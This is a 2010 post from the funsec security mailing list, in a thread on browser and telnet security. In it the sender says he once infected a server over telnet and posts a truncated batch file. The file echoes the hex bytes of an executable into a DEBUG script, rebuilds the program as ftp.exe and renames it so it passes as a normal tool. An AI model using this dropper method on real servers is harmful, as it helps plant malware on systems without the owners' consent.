[funsec] fog of cyberwar

Joel Helgeson joel at helgeson.com
Sat Jan 23 19:18:10 CST 2010


Actually, I've infected a server via telnet before, by echoing hex strings
to a text file, then using debug to convert to an exe.  One could just as
easily use any other executable...

<----contents of ftp.bat ---->
@ECHO OFF>1
echo e 0100 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00>>1
echo e 0110 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00>>1
echo e 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00>>1
echo e 0130 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00>>1
echo e 0140 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68>>1
<---- Lines Deleted ---->
echo e 44E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00>>1
echo e 44F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00>>1
echo rcx>>1
echo 4400>>1
echo n ftp.sys>>1
echo w>>1
echo q>>1
debug<1>nul
rename ftp.sys ftp.exe
</----contents of ftp.bat ---->

Joel Helgeson

-----Original Message-----
From: funsec-bounces at linuxbox.org [mailto:funsec-bounces at linuxbox.org] On
Behalf Of Dan Kaminsky
Sent: Friday, January 22, 2010 1:15 PM
To: Vaughn, Randal L.
Cc: funsec at linuxbox.org; Rich Kulawiec
Subject: Re: [funsec] fog of cyberwar

Actually, against telnet you just push the console echo attacks and
kill the session.

On Fri, Jan 22, 2010 at 8:03 PM, Vaughn, Randal L. <RL_Vaughn at baylor.edu>
wrote:
> telnet?
>
> On Jan 22, 2010, at 9:45 AM, Dan Kaminsky wrote:
>
>>>> IE should not be used anymore?  What took you so long?
>>>
>>> Anybody still using IE doesn't deserve any help, any sympathy, any
>>> support. They are deliberately setting themselves on fire -- so let
>>> them burn.
>>
>> So which browser exactly is the secure one?
>>
>> _______________________________________________
>> Fun and Misc security discussion for OT posts.
>> https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
>> Note: funsec is a public and open mailing list.
>
>

_______________________________________________
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.




More information about the funsec mailing list